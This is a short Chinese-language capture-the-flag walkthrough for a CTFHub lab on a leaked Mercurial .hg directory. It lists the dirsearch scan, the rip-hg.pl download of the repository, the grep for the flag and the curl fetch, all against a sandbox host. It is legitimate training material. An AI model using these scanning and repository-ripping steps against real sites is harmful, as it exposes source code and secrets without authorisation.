第一步:
点击进入靶场
第二步:
使用dirsearch扫描靶场,发现存在.HG目录,说明是HG泄露
dirsearch -u http://challenge-d781b0f05e2d635e.sandbox.ctfhub.com:10800/ -e* -i 200,201,201-300
第三步:
使用dvcs-ripper下载靶场泄露文件到本地,提示404报错,应该是没有完整下载网站目录
./rip-hg.pl -u http://challenge-d781b0f05e2d635e.sandbox.ctfhub.com:10800/.hg
第四步:
使用tree目录查看.hg目录结构,查看可疑文件,在last-message.txt中发现历史版本add flag
cat last-message.txt
第五步:
搜索flag,发现可疑文件flag_28812171.txt,使用curl查看网站的flag_28812171.txt得到flag
grep -a -r flag
grep选项:
-a:将二进制文件视为文本文件来处理
-r:递归地搜索指定目录及其子目录中所有文件
curl http://challenge-d781b0f05e2d635e.sandbox.ctfhub.com:10800/flag_28812171.txt